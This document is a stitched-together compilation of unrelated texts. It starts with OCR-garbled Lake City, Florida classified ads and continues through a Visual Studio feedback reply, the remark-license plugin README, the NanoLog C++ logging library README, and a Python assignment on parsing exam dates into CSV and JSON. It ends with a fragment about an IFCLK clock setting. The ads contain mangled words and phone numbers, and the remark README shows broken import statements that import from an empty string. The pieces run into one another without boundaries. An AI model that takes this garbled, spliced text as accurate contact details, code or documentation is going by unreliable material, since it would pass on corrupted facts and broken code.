2. In your fw.c file, replace #define _IFREQ 48000 with #define _IFREQ "your IFCLK frequency in kHz units". For example: #define _IFREQ 12000 // here the IFCLK frequency is 12 MHz. This macro has to be placed before #include "syncdly.h", because the SYNCDELAY calculations include the IFCLK value and an incorrect IFCLK value will give an incorrect synchronization delay.

3. Check that the slwr/slrd and data signals meet the setup and hold time requirements with respect to IFCLK.
https://community.cypress.com/docs/DOC-12668
CC-MAIN-2020-40
refinedweb
121
63.09
/* Threads compatibility routines for libgcc2 and libobjc for LynxOS. */
/* Compile this one with gcc. */

#ifndef GCC_GTHR_LYNX_H
#define GCC_GTHR_LYNX_H

#ifdef _MULTITHREADED

/* Using the macro version of pthread_setspecific leads to a
   compilation error. Instead we have two choices: either kill all
   macros in pthread.h by defining _POSIX_THREADS_CALLS or undefine
   individual macros where we should fall back on the function
   implementation. We choose the second approach. */

#include <pthread.h>
#undef pthread_setspecific

/* When using static libc on LynxOS, we cannot define pthread_create
   weak. If the multi-threaded application includes iostream.h,
   gthr-posix.h is included and pthread_create will be defined weak.
   If pthread_create is weak, its defining module in libc is not
   necessarily included in the link and the symbol is resolved to zero.
   Therefore the first call to it will crash.

   Since -mthreads is a multilib switch on LynxOS we know that at this
   point we are compiling for multi-threaded. Omitting the weak
   definitions at this point should have no effect. */

#undef  GTHREAD_USE_WEAK
#define GTHREAD_USE_WEAK 0

#include "gthr-posix.h"

#else
#include "gthr-single.h"
#endif

#endif /* GCC_GTHR_LYNX_H */
http://opensource.apple.com//source/gcc_42/gcc_42-5531/gcc/gthr-lynx.h
CC-MAIN-2016-40
refinedweb
177
52.46
BizTalk Server SAN + File shares question

- From: "BA" <biztalk.architect@xxxxxxxxx>
- Date: Tue, 1 Apr 2008 08:47:38 -0400

Has anyone ever had problems with a farm of BizTalk servers picking up files from a SAN via a group of file shares? Apparently my client had this problem with BTS 2002 and I am wondering if anyone has heard of this issue existing on 2006. Has anyone ever experienced any problems using BizTalk with a SAN and 30+ file shares?

Thanks,
BA
http://www.tech-archive.net/Archive/BizTalk/microsoft.public.biztalk.general/2008-04/msg00009.html
crawl-002
refinedweb
127
63.63
Sorting is such a common task that C# includes an Array class with a flexible sort method for all your sorting needs. This class is located in the System namespace, so make sure you add using System; to the top of your code file. Let us first look at a basic sort to see what the method looks like:

int[] v = {1, 3, 2, 4, 5};
Array.Sort(v);
foreach (var i in v)
{
    Console.WriteLine(i);
}
Console.Read();

If you run the code you will see the elements of v printed one per line in increasing order. The Sort method by default sorts items in increasing order. Change the code to this:

double[] v = { 1.0, 3.1, 2.2, 4.3, 5.4 };
Array.Sort(v);
foreach (var i in v)
{
    Console.WriteLine(i);
}
Console.Read();

When you run it, you will see that the items in v are still sorted in ascending order. This shows us that the Sort method is flexible enough to work with more than one data type. The question here is: does it work with all types? The answer is simply no. It only works with objects that implement the IComparable interface. If we want to sort a collection whose elements do not implement IComparable, we must provide a class that implements IComparer to use for the comparison.

Before we look at sorting using IComparable and IComparer, let's look at sorting ranges of arrays. For this, we will use the method:

Array.Sort(Array array, int index, int length);

This method requires you to provide the first index of the range and the length of the range you want to sort. Example:

double[] v = { 3.0, 1.1, 2.2, 4.3, 5.4 };
Array.Sort(v, 0, 2);
foreach (var i in v)
{
    Console.WriteLine(i);
}
Console.Read();

In this example we are going to sort the part of v from index 0 to index 1. Notice how we mentioned we are going to start at index 0 and sort the first 2 elements? Since arrays are 0-based, we are only going to sort the elements at positions 0 and 1. In general, the range that is going to be sorted is [index, index + length - 1].
When you run this code the output is the following:

1.1
3.0
2.2
4.3
5.4

Notice how the rest of the array after index 1 was not modified. If we wanted to start at index 2 and sort 4 elements we would write:

Array.Sort(v, 2, 4);

This code will throw an exception if there are not enough elements to fill the range properly. This means that there must be elements in positions 2, 3, 4, and 5 or this will crash.

Using IComparable

The use of IComparable allows us to sort arrays in complicated ways. Let us use an example of sorting in increasing order by age, followed by descending lexicographical order by name. First, we need this class:

class Person
{
    public string Name { get; set; }
    public int Age { get; set; }
}

This class declares two auto-implemented properties, Name and Age, each with a getter and a setter. This lets us change the age by doing p.Age = 10. Create this array:

var people = new Person[4];
var p = new Person {Age = 10, Name = "chili5"};
people[0] = p;
p = new Person {Age = 8, Name = "Zeus"};
people[1] = p;
p = new Person {Age = 10, Name = "Fred"};
people[2] = p;
p = new Person {Age = 11, Name = "Bob"};
people[3] = p;

Next we have to implement the IComparable interface. Change the class declaration to this:

class Person : IComparable

The : is used to implement an interface. When we implement an interface, we must implement all methods defined in the interface. In this case that is the CompareTo(Object) method. Add this method to the Person class:

public int CompareTo(Object obj)
{
    var p = (Person) obj;
    if (p.Age > Age) return -1;
    if (p.Age < Age) return 1;
    return p.Name.CompareTo(Name);
}

This method compares the current Person to another one: it returns a negative number if the current object should sort before the argument, a positive number if it should sort after it, and 0 only when both age and name are equal (ties on age are broken by name in descending order).
Consider these two objects:

var p = new Person {Age = 10, Name = "chili5"};
var p2 = new Person {Age = 8, Name = "Zeus"};

If we do p.CompareTo(p2) the result will be 1. Why? First we compare the two ages: p's age is 10, which is bigger than p2's age of 8, so the method returns a positive number. This means that in order of age p should come after p2.

Hope this is helpful. Later we will look at LINQ and see how that implements complex sorting. Then you can make a judgement about which you prefer. In some cases it might be easier to use one over the other, or in some cases, such as databases, it makes sense to use LINQ.
http://forum.codecall.net/topic/65333-c-flexible-sorting/
CC-MAIN-2018-39
refinedweb
840
72.16
Important: Please read the Qt Code of Conduct - How to use/include the QtNetwork Module

Hello Everyone, I'm trying to develop a simple application in C++ that sends files between two computers over LAN. After some research I found out that the QtNetwork module is the way to go. I do include QTcpServer and QTcpSocket in my solution:

#include <QTcpServer>
#include <QTcpSocket>

I added the following path to the Additional Include Directories of my project: C:\Qt\5.14.2\msvc2017_64\include\QtNetwork

I then tried a very simple piece of code:

QTcpSocket* pTcpSocket = new QTcpSocket();

I get the "unresolved external symbol" error, which means that the functions are declared but not defined. It seems to be a problem with the linking or building of the QtNetwork module. On the Qt website I found out that one should add the following line:

QT += network

Since I have no experience with cmake or qmake, I'm not sure where to add this line. Can anyone please recommend a simple example or explain how to correctly use the module? Thanks!!

- jsulm Qt Champions 2019 last edited by

@JohnSRV said in How to use/include the QtNetwork Module: i'm not sure where to add this line

Open your .pro file and add that line where the other "QT +=" lines are. If you are using a CMake project, add find_package(Qt5 COMPONENTS Network REQUIRED) and then target_link_libraries(MyApp PUBLIC Qt5::Network), where MyApp is the name of your target.

Hey, thanks for the answers. I'm actually using a Visual Studio 2017 project and that's why I'm confused. There's no .pro file under the path of my project :/. Is it at all possible to use the QtNetwork module in a Visual Studio 2017 project?? Thanks!

If you have the Qt Visual Studio Tools installed then right-click on your project, go into the Qt Project property and in the modules tab put a tick next to Network.

No, I don't have the Qt VS Tools installed. How can I install them? Thanks!!

Update: Now I installed the Qt VS Tools for VS 2017.
Do I have to start a new project to add the Network module, or can I add it to my already existing VS project?

Last time I used the VS Tools (that was with VS 2013) it required starting a project from scratch; not sure if they have introduced a "convert to Qt project" feature since.
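For completeness, here is what the CMake route from the earlier reply might look like as a minimal CMakeLists.txt (the target and file names are placeholders):

```cmake
cmake_minimum_required(VERSION 3.5)
project(MyApp)

# Locate the Qt5 Network module and link it into the target
find_package(Qt5 COMPONENTS Core Network REQUIRED)

add_executable(MyApp main.cpp)
target_link_libraries(MyApp PUBLIC Qt5::Network)
```

With qmake instead, the equivalent is the single line QT += network in the .pro file, as mentioned above.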
https://forum.qt.io/topic/115740/how-to-use-include-the-qtnetwork-module/5
CC-MAIN-2020-45
refinedweb
409
66.57
In this tutorial, we will learn about numpy.log() in Python. The Numpy module offers powerful data manipulation methods. It mostly deals with data stored in arrays. The numpy.log() method lets you calculate the mathematical log of any number or array. Let's learn how to use numpy.log() to calculate logs in Python.

Table of Contents
- 1 Using numpy.log() in Python
- 2 Using numpy.log() on 0
- 3 Using Numpy.log() on Arrays
- 4 Plotting numpy.log() function using Matplotlib
- 5 Conclusion

Using numpy.log() in Python

To use numpy.log() we will first have to import the Numpy module.

import numpy

Now we can use numpy.log() to find out the log of different numbers.

import numpy as np
print(np.log(10))

Output: 2.302585092994046

Let's try another example.

import numpy as np
print(np.log(np.e))

Output: 1.0

We get 1 as the output because numpy.log by default calculates the natural log. The natural log is calculated with a base of e. The value of e is: 2.718281828459

Let's try calculating the log of 0.

Using numpy.log() on 0

Let's see what happens when we use the numpy.log function on 0.

import numpy as np
print(np.log(0))

Output:
-inf
/usr/local/lib/python3.6/dist-packages/ipykernel_launcher.py:1: RuntimeWarning: divide by zero encountered in log

The logarithm of zero is not defined: no real exponent produces zero, so NumPy returns -inf along with a divide-by-zero warning. There are some other logs that you can calculate using np.log. These are log2 and log10, which are logarithms with base 2 and 10 respectively.

1. Calculating log with base 2

To calculate a logarithm with base 2, use log2 in place of log.

import numpy as np
print(np.log2(8))

Output: 3.0

Let's try another example.

import numpy as np
print(np.log2(32))

Output: 5.0

2. Calculating log with base 10

To calculate a logarithm with base 10, use log10 in place of log.

import numpy as np
print(np.log10(100))

Output: 2.0

Let's try another example.
import numpy as np
print(np.log10(10000))

Output: 4.0

Using Numpy.log() on Arrays

Let's see how to use numpy.log on arrays.

1. Calculating Logarithm of a 1D array

To calculate the logarithm of a 1D array use:

import numpy as np
arr = np.array([1,2,4,5,6,8])
print(np.log2(arr))

Output: [0. 1. 2. 2.32192809 2.5849625 3.]

2. Calculating Logarithm of a 2D array

To calculate the logarithm of a 2D array use:

import numpy as np
arr_2d = np.arange(4,10).reshape((2,3))
print(arr_2d)
print(np.log2(arr_2d))

Output:
[[4 5 6]
 [7 8 9]]
[[2. 2.32192809 2.5849625 ]
 [2.80735492 3. 3.169925 ]]

Plotting numpy.log() function using Matplotlib

Let's try plotting a graph for the logarithmic function. To plot a graph we will need a lot of points in our array. Our approach is as follows: we will create a Numpy array of the integers from 1 to 999, store the log of this array, and then create a plot using the stored values. Let's see the code for the same.

import numpy as np
import matplotlib.pyplot as plt

arr = np.arange(start = 1, stop = 1000)
log_val = np.log(arr)
plt.plot(log_val, arr, color='purple')

Output:

Conclusion

This tutorial was about the Numpy.log function in Python. We learned how to use numpy.log for calculating logs of integers and arrays. We also learned how to plot a graph using numpy.log and matplotlib.
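One thing the tutorial does not cover: logarithms with an arbitrary base. NumPy only provides log, log2, and log10, but any other base follows from the change-of-base identity (the function name below is my own):

```python
import numpy as np

# log_b(x) = ln(x) / ln(b)  (change-of-base identity)
def log_base(x, b):
    return np.log(x) / np.log(b)

print(log_base(81, 3))                      # ~4.0
print(log_base(np.array([5, 25, 125]), 5))  # ~[1. 2. 3.]
```

This works element-wise on arrays exactly like np.log itself.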
https://www.journaldev.com/46723/numpy-log-in-python
CC-MAIN-2021-17
refinedweb
625
72.42
What are Access Modifiers?

Have you ever wanted to define how people would access some of your property? You would not want anyone using your underwear. However, your close friends and relatives can use your sweater and maybe your car. Similarly to how you set a level of access to your possessions, Java lets you set a level of access to your classes, variables, and methods. The most restrictive level is private, which makes a member accessible only within the class that declares it.

Let us use private in a coding example. If a bank wants to provide an interest rate of 10% on its loans, it would make sure that the interest rate variable (let us suppose int int_rate;) stays private, so that no other class could access it and change it. For example:

private String name;

The above example creates a variable called name and ensures that it is only accessible within the class from which it was created.

Another access modifier is public, and it means that it is accessible from any class. The public access modifier can be likened to a public school where anyone can seek admission and be admitted. A public class, method, or variable can be accessed from any other class at any time. For example, to declare a class as public, all you need is:

public class Animal{
}

As such, the Animal class can be accessed by any other class.

public int age;
public int getAge(){
}

Above are ways of specifying a variable and a method as public.

The Default Access Modifier

The default access modifier is different from all the other access modifiers in that it has no keyword. To use the default access modifier, you simply use none of the other access modifiers, and that simply means you are using the default access modifier. For example, to use the default access modifier for a class, you use:

class Bird{
}

This basically means you are using the default access modifier. The default access modifier allows a variable, method, or class to be accessible by other classes within the same package. A package is a collection of related classes in a file directory. For more information about packages, check out the section on packages.
Any variable, method, or class declared with the default access modifier cannot be accessed by any class outside of the package in which it was declared.

int age;
void setNewAge(){
}

Above are some ways of using the default access modifier for a variable or method. Don't forget: the default access modifier does not have a keyword. The absence of the 3 other access modifiers means you are using the default access modifier.

Protected Access Modifier

The protected access modifier is closely related to the default access modifier. It has the properties of the default access modifier but with a little improvement. Only variables and methods can use the protected access modifier. The little improvement is that a class outside the package in which the variable or method was declared can access the said variable or method. This is possible ONLY if it inherits from the declaring class, however. A class from another package that can see protected variables or methods must have extended the class that declared them. Note that without the advantage of inheritance, the default access modifier grants exactly the same access as the protected one. Examples of using the protected access modifier are shown below:

protected int age;
protected String getName(){
    return "My Name is You";
}

Access Modifiers on Classes

By default, classes can only have 2 modifiers:

- public
- no modifier (default modifier)

So this means classes can never be set to private or protected? This is logical: why would you want to make a private class? No other class would be able to use it. But sometimes you can embed a class into another class. These special classes, inner classes, can be set to private or protected so that only the surrounding class can access them:

public class Car {
    private String brand;
    private Engine engine;
    // ...
    private class Engine {
        // ...
    }
}

In the above example, only the Car class can use the Engine class.
This can be useful in some cases. Other classes can never be set to protected or private, because it makes no sense. The protected access modifier is used to make things package-private but with the option to be accessible to subclasses. There is no concept such as 'subpackages' or 'package-inheritance' in Java.
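All four levels can be seen side by side in one class (a sketch; the class and field names are made up):

```java
// From inside the declaring class every member is visible; outside it,
// visibility shrinks from public to protected to default to private.
public class AccessDemo {
    public int pub = 1;     // any class, any package
    protected int prot = 2; // same package, plus subclasses in other packages
    int pack = 3;           // default: same package only
    private int priv = 4;   // this class only

    public static void main(String[] args) {
        AccessDemo d = new AccessDemo();
        // Inside the declaring class, all four fields are accessible:
        System.out.println(d.pub + d.prot + d.pack + d.priv); // prints 10
    }
}
```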
https://www.freecodecamp.org/news/java-access-modifiers-explained/
CC-MAIN-2022-05
refinedweb
723
53.71
right now my program asks for 5 candidates but i want to make the user input as many candidates as they want to. how would i go about doing that??

#include <iostream>
#include <iomanip>
#include <string>
using namespace std;

int sumVotes(int list[], int size);
int winnerIndex(int list[], int size);

int main()
{
    string candidates[5];
    int votes[5] = {0};
    int totalVotes;
    int i;
    cout << fixed << showpoint;
    cout << setprecision(2);
    cout << "Enter candidate's name and the votes received by "
         << "the candidate." << endl;
    for (i = 0; i < 5; i++)
        cin >> candidates[i] >> votes[i];
    totalVotes = sumVotes(votes, 5);
    cout << "Candidate Votes Received % of Total Votes" << endl;
    for (i = 0; i < 5; i++)
        cout << left << setw(10) << candidates[i] << right << " "
             << setw(10) << votes[i] << " " << setw(15)
             << (static_cast<double>(votes[i]) / static_cast<double>(totalVotes)) * 100
             << endl;
    cout << "Total " << totalVotes << endl;
    cout << "The Winner of the Election is "
         << candidates[winnerIndex(votes, 5)] << "." << endl;
    return 0;
}

int sumVotes(int list[], int size)
{
    int sum = 0;
    for (int i = 0; i < size; i++)
        sum = sum + list[i];
    return sum;
}

int winnerIndex(int list[], int size)
{
    int winInd = 0;
    for (int i = 0; i < size; i++)
        if (list[i] > list[winInd])
            winInd = i;
    return winInd;
}
https://www.daniweb.com/programming/software-development/threads/358095/am-trying-to-figure-how-to-make-my-program-truly-dynamic
CC-MAIN-2021-43
refinedweb
197
53.89
I'm new to Python, using Python 3.6.2, and I'm trying to scrape data from the first 2 pages using a specific keyword. So far I'm able to get the data into the Python IDLE window, but I'm facing difficulty in exporting the data to CSV. I have tried using BeautifulSoup 4 and pandas but am not able to export. Here is what I have done so far. Any help would be much appreciated.

import csv
import requests
from bs4 import BeautifulSoup
import pandas as pd

url = "- alias%3Dautomotive&field- keywords=helmets+for+men&rh=n%3A4772060031%2Ck%3Ahelmets+for+men&ajr=0"
request = requests.get(url)
soup = BeautifulSoup(request.content, "lxml")
#filename = auto.csv
#with open(str(auto.csv,"r+","\n")) as csvfile:
#headers = "Count , Asin \n"
#fo.writer(headers)
for url in soup.find_all('li'):
    Nand = url.get('data-asin')
    #print(Nand)
    Result = url.get('id')
    #print(Result)
    #d=(str(Nand), str(Result))
    df=pd.Index(url.get_attribute('url'))
    #with open("auto.txt", "w",newline='') as dumpfile:
    #dumpfilewriter = csv.writer(dumpfile)
    #for Nand in soup:
    #value = Nand.__gt__
    #if value:
    #dumpfilewriter.writerows([value])
    df.to_csv(dumpfile)
    dumpfile.close()
csvfile.csv.writer("auto.csv," , ',' ,'|' , "\n")
I added a user-agent header to the request to avoid the site auto-blocking bots. You got a lot of None because you didn't specify precisely which <li> tags you want. I added that to the code as well.

import requests
from bs4 import BeautifulSoup
import pandas as pd

url = ""
request = requests.get(url, headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'})
soup = BeautifulSoup(request.content, "lxml")

res = []
for url in soup.find_all('li', class_ = 's-result-item'):
    res.append([url.get('data-asin'), url.get('id')])

df = pd.DataFrame(data=res, columns=['Nand', 'Result'])
df.to_csv('path/where/you/want/to/store/file.csv')

EDIT: for processing all pages you need to build a loop that generates the urls, which you then pass to the main processing block (which you already have). Check out this page:. The interesting part here is the ref parameter - ref=sr_pg_2. Its value is for page 2. I think you know what to do next =)
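The EDIT above can be sketched like this (the base URL below is a placeholder, not the real query string from the question):

```python
# Build one URL per results page by varying the page marker (ref=sr_pg_N),
# then feed each generated URL to the scraping block shown above.
base = "https://example.com/s?keywords=helmets&ref=sr_pg_{}"
urls = [base.format(page) for page in range(1, 3)]
print(urls)
```

Each generated URL would then go through requests.get / BeautifulSoup exactly as in the answer's code.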
https://codedump.io/share/eepQfw08L835/1/scraping-web-contents-from-first-two-page-and-export-scraped-data-to-csv-using-python-and-bs4
CC-MAIN-2019-26
refinedweb
372
55.5
Process Overview for Creating and Implementing RTF Sub Templates

You must follow this process to work with RTF sub templates. Using a sub template consists of the following steps (described in the following sections):

- Create the RTF file that contains the common components or processing instructions that you want to include in other templates.
- Create the calling or "main" layout and include the following two commands:
  import - to import the sub template file to the main layout template.
  call-template - to execute or render the sub template contents in the main layout.
- Test the template and sub template.
  Tip: You can use the Publisher Desktop Template Viewer to test the main layout plus sub template before loading them to the catalog. To do so, you must alter the import template syntax to point to the location of the sub template in the local environment. See Test Subtemplates from the Desktop.
- Upload the main template to the report definition and create the Sub Template object in the catalog. See Upload a Subtemplate.
https://docs.oracle.com/en/cloud/paas/analytics-cloud/acpmr/process-overview-creating-and-implementing-rtf-subtemplates.html
CC-MAIN-2020-50
refinedweb
171
62.78
Name Error : Name 'time' is not defined

Hello all, I am getting an error while refreshing the page in V7:

File "server/openerp/addons/base/ir/ir_ui_menu.py", line 336, in get_needaction_data
    dom = menu.action.domain and eval(menu.action.domain, {'uid': uid}) or []
File "server/openerp/tools/safe_eval.py", line 241, in safe_eval
    return eval(test_expr(expr, _SAFE_OPCODES, mode=mode), globals_dict, locals_dict)
File "", line 1, in <module>
NameError: name 'time' is not defined

What may be the issue? Please help.

Hi, It seems that's a known bug: I went through the fix proposed and tested it and, at a first glance, it works! Hope this helps!

<record id="action_view_task" model="ir.actions.act_window">
    <field name="name">Tasks</field>
    <field name="res_model">project.task</field>
    <field name="view_mode">kanban,tree,form,calendar,gantt,graph</field>
    <field name="domain">[('date','=',time.strftime('%Y-%m-%d')),('user_id','=',uid)]</field>
    <field name="filter" eval="True"/>
    <field name="search_view_id" ref="view_task_search_form"/>
    <field name="help" type="html">
        <p class="oe_view_nocontent_create">
            Click to create a new task.
        </p><p>
            OpenERP's project management allows you to manage the pipeline of tasks in order to get things done efficiently. You can track progress, discuss on tasks, attach documents, etc.
        </p>
    </field>
</record>

This is my action code.

Add this line at the top of your code, with the other import lines:

import time

Hi GuruDev, Maybe you have not imported the time library in your py file. That's why it is giving the error about time. Hope it will work after importing time in the py file.

Thanks for the reply, Keyur. I should import it in the ir_ui_menu.py file? How to import?

in the .py file.. import time is it ok?

Have you created your custom module?
Have you created any menu or applied a domain on any action? I think the error comes because of the domain in the action.

I didn't create any module. But I duplicated some groups and made some modifications in access. And also, I didn't add any domain.

Basic addons are not error prone. Maybe there can be another reason. You should try a different database; maybe then it will work properly.

Dear Keyur, I was creating a new user group for Approvals. I've added a new menu item into the existing Accounting menu and gave access rights to this newly created user group. That menu item contains an action: Purchase Orders Waiting for Approval. This was the only change that I made.

Can you please paste your action code here? I will try it in my custom module. Then I can figure out what exactly the problem is.

hello Keyur.. I need your help.. I am adding a domain in an action and it's giving the error that time is not defined. I have defined import time in the .py file.. but of no use.. Please help
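The root cause behind the whole thread (a sketch of the idea; the expression is taken from the action XML above): the domain string is evaluated as a Python expression, so the evaluation context must contain time, the same way it already contains uid.

```python
import time

# The domain from the action XML references `time`; evaluating it raises
# "NameError: name 'time' is not defined" unless the context supplies it.
domain_expr = "[('date', '=', time.strftime('%Y-%m-%d'))]"

context = {'time': time}      # without this entry: NameError
domain = eval(domain_expr, context)
print(domain)
```

This mirrors why the linked bug fix works, while adding import time to an unrelated .py file does not.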
https://www.odoo.com/forum/help-1/question/name-error-name-time-is-not-defined-22212
CC-MAIN-2017-39
refinedweb
525
69.99
I'd like to parameterize a class with the type of an object to make my code more generic. By doing this, I don't need an implementation for all objects that extend a certain trait. I have the following code that demonstrates my goal: abstract trait Foo { def greet } object Coo extends Foo { def greet = println("Coo!") } object Boo extends Foo { def greet = println("Boo!") } class A[Fooer <: Foo] { def moo = asInstanceOf[Fooer].greet() } object Main extends App { new A[Coo.type].moo() // hopefully prints "Coo!" } java.lang.ClassCastException: A cannot be cast to Foo asInstanceOf this And I believe it's because of the asInstanceOfcall which is seemingly using thisimplicitly. Every class in Scala extends Any, which inherits the special method asInstanceOf, among other things. I wouldn't say it's happening implicitly--it's just that you're calling a member method of that class, which is calling it on itself. Same as if you wrote def moo = greet. Furthermore, any time you use asInstanceOf, you're asking the compiler to lie to itself and keep going. This will more often than not result in a ClassCastException. In this case, it's because you're attempting to cast an instance A into some unknown sub-type of Foo. This will never work. In the very specific case, you're attempting to pass the singleton type Coo.type to an instance of A and then create a new instance of Coo.type. While there are many other reasons why this won't work, one of them is that you can't create a second instance of a singleton type--it's called that for a reason. More generally, you don't know that you can simply construct an object given a type. A type doesn't have a constructor, a class does. This might be a side-effect of being a simplified example, but you're concerned with creating an instance of A with some type parameter without needing to pass it an actual object, but the objects you're concerned with already exist. So why not pass them? 
class A[Fooer <: Foo](f: Fooer) { def moo = f.greet } The only other way to do this is to provide evidence that Fooer can be constructed. There are no type constraints for proving something is a constructable class, though. What you can do is require a Class meta object instead: class A[Fooer <: Foo](clazz: Class[Fooer]) { def moo = clazz.newInstance.greet } This is crude, however. First, it doesn't work with your singleton types above (because they can't be constructed again). And second, we can only call newInstance when there are no constructor parameters to provide, and there's no way to enforce that. So while this will work: scala> class Bar extends Foo { def greet = print("Bar") } scala> new A(classOf[Bar]).moo Bar The following will not: scala> class Baz(i: Int) extends Foo { def greet = println("Baz") } defined class Baz scala> new A(classOf[Baz]).moo java.lang.InstantiationException: Baz scala> new A(classOf[Coo.type]).moo <console>:14: error: class type required but Coo.type found new A(classOf[Coo.type]).moo ^ Alternatively, you might use a type class that allows you to consistently build instances of Foo, but that would require creating one for each sub-class. e.g.: trait FooBuilder[A] { def build(): A } implicit object BarBuilder extends FooBuilder[Bar] { def build() = new Bar } class A[Fooer <: Foo](implicit fb: FooBuilder[Fooer]) { def moo = fb.build().greet }
https://codedump.io/share/pZu02khliK3O/1/how-can-i-parameterize-a-class-with-an-object39s-type-to-get-an-instance-of-it-in-scala
CC-MAIN-2017-09
refinedweb
586
65.52
Run update21 in a terminal window to create cs21/labs/11 directory. Then cd into your cs21/labs/11 directory and create the python program for lab 11 in this directory. The program handin21 will only submit files in this directory. There are some optional components that allow you to further practice your skills in Python. These optional components will not be graded, but may be interesting for those wanting some extra challenges. Fighting fires is a very risky job, and proper training is essential. In the United States, the National Fire Academy offers classes that are intended to enhance the ability of fire fighters to deal more effectively with forest fires. The Academy has worked with the U.S. Forest Service to develop a three-dimensional fire fighting training simulator. This simulator allows fire fighters to test out strategies under a variety of topographic settings and weather conditions, and to learn which approaches tend to be more successful. Using simulations to model real-world problems where it may be too difficult, time-consuming, costly or dangerous to perform experiments is a growing application of computer science. For this lab you will create your own two-dimensional fire simulator. The idea for this lab came from a 2007 SIGCSE Nifty Assignment suggested by Angela B. Shiflet of Wofford College. We are providing you with a basic Terrain class. You will be using an instance of this class inside the fire simulation class that you will be writing. You do not need to modify the Terrain class, but you do need to know how to use it. The Terrain class models a forest as a rectangular grid of rows and columns. Each cell in the grid is in one of three possible states: Examine the methods in the Terrain class by opening a Python shell, importing the Terrain module using from terrain import * and running help(Terrain). The sample code below shows how the methods might be used. 
from terrain import *
t = Terrain(10, 12)
t.setEmpty(3,3)
t.setBurning(1,2)
t.update()
t.close()

The resulting Terrain is shown below. Note that the cell in location (0,0) is in the lower left corner. Be sure you understand how to use the Terrain class before going on. In particular, note that the terrain does not immediately update after a call to setEmpty or setBurning. Instead, you must call update, which will update all cells with their new status. The basic rules for updating the status of each cell are as follows: The image below shows the status of a fire after 10 steps:

def main():
    f = FireSim(10, 12, .55)
    f.startFire()
    f.spread()
    print "This fire burned %0.2f%% of the Terrain in %d steps" \
        % (f.percentBurned(), f.numSteps())
    f.close()

A sample run of this function might print:

This fire burned 69.17% of the Terrain in 18 steps.

You may have different method names with different parameters. Remember, the design is up to you as long as you implement all the requirements. Be sure to test your class by creating some terrains with different sizes, changing the probability of burning, or starting fires in different locations. To simulate an event that happens with probability prob, you can use:

if random() < prob:
    print "yes"

There are many extensions you could add to this program. You could modify how the fire spreads by adding additional rules or parameters. For example, perhaps the probability of catching on fire depends on the number of neighboring trees that are on fire. Perhaps you can add a wind direction and modify the probabilities such that trees down-wind of an active fire are more likely to burn. Perhaps you can create an initial grid with a few "fire lines" of empty cells to prevent fires from spreading. Add a feature where cells could randomly start burning even if no neighbors are burning (as happens with lightning). Allow fire to spread to cells that are more than one cell away. If you allow this feature, can you get a fire to jump a fire line?
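The random() hint above is exactly the mechanism needed for the spread rule; one possible phrasing (illustrative only, not the required design):

```python
from random import random

# A tree with at least one burning neighbor catches fire with
# probability prob; with no burning neighbor it stays a tree this step.
def catches_fire(has_burning_neighbor, prob):
    return has_burning_neighbor and random() < prob
```

Because random() returns a value in [0, 1), catches_fire(True, 1.0) is always True and catches_fire(True, 0.0) is always False.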
More complex models could factor in topography, soil moisture, smoldering fires, etc., and are actually used in some geographical information system (GIS) applications for predicting and modeling forest fire risk. Once you are satisfied with your program, hand it in by typing handin21 in a terminal window.
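To see how the pieces might fit together end to end, here is one possible skeleton of a FireSim class. This is only a sketch, not the required design: it replaces the graphical Terrain with a plain 2-D list so it runs standalone, it assumes a common version of the update rule (a burning cell burns out in one step, and each tree next to a burning cell catches fire with probability prob), and it uses Python 3 print calls. Your method names and parameters may differ.

```python
from random import random, seed

TREE, EMPTY, BURNING = 0, 1, 2  # the three cell states

class FireSim:
    """Minimal fire simulator on a rows x cols grid of trees."""

    def __init__(self, rows, cols, prob):
        self.prob = prob   # chance a burning neighbor ignites a tree
        self.steps = 0
        self.grid = [[TREE] * cols for _ in range(rows)]

    def startFire(self):
        # ignite the center cell
        self.grid[len(self.grid) // 2][len(self.grid[0]) // 2] = BURNING

    def _neighbors(self, r, c):
        # the four cells directly up, down, left, and right of (r, c)
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            if 0 <= r + dr < len(self.grid) and 0 <= c + dc < len(self.grid[0]):
                yield r + dr, c + dc

    def spread(self):
        # advance the simulation until no cell is burning
        while any(BURNING in row for row in self.grid):
            new = [row[:] for row in self.grid]
            for r, row in enumerate(self.grid):
                for c, cell in enumerate(row):
                    if cell == BURNING:
                        new[r][c] = EMPTY  # burning cells burn out
                        for nr, nc in self._neighbors(r, c):
                            if self.grid[nr][nc] == TREE and random() < self.prob:
                                new[nr][nc] = BURNING
            self.grid = new
            self.steps += 1

    def percentBurned(self):
        cells = [c for row in self.grid for c in row]
        return 100.0 * cells.count(EMPTY) / len(cells)

    def numSteps(self):
        return self.steps

seed(21)
f = FireSim(10, 12, 0.55)
f.startFire()
f.spread()
print("burned %.2f%% in %d steps" % (f.percentBurned(), f.numSteps()))
```

With prob close to 1 nearly the whole grid burns; with small prob the fire usually dies out after a few steps, which is a quick way to sanity-check your own implementation.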
https://web.cs.swarthmore.edu/~adanner/cs21/s15/Labs/lab11.php
16 August 2011 15:20 [Source: ICIS news]

TORONTO (ICIS)--Compared with June 2010, chemical industry sales were up 9.2%, Statistics Canada said.

Sales of petroleum and coal products fell 6.6% in June from May, to C$5.84bn, but were up 9.5% year on year.

Overall Canadian manufacturing sales fell by 1.5% in June from May, to C$45.31bn – marking their third decline in a row after growing steadily since May 2009.

Compared with June 2010, Canada's overall manufacturing sales were up 2.3%.

June's inventories were flat at C$63.16bn compared with May, but up 8.9% from June 2010. June's new orders were worth C$47.25bn, up 1.6% from May and up 5.2% year on year from June 2010.

The inventory-to-sales ratio was 1.39 in June, compared with 1.37 in May and 1.31 in June 2010. The ratio measures how many months it would take to deplete stocks at the current rate of sales.
http://www.icis.com/Articles/2011/08/16/9485648/canada-june-chemical-sales-rise-5.8-from-may.html
Hi there, I have read through the numerous feeds for downloading PLS add-ons and the Python extension modules - however I am stumped quite early on. When I click on the Statistical Tools link under the "Downloads for IBM SPSS Statistics" section of the IBM developerWorks page, I am directed to the My Files page without any links for download. Can anyone help me out here? Is there an alternative route for downloading the PLS extension? Thanks in advance! M

Answer by JonPeck (4671) | May 06, 2013 at 09:39 PM

If I click on the link I think you are referring to (), I see a list of 52 downloadable items, including the PLS package. If for some reason you can't get that view, you can use the Extension Commands collection link on that same page. You can sort the list alphabetically by clicking the small "Name" control at the top of the list. HTH

Answer by mtvinski (0) | May 07, 2013 at 03:15 PM

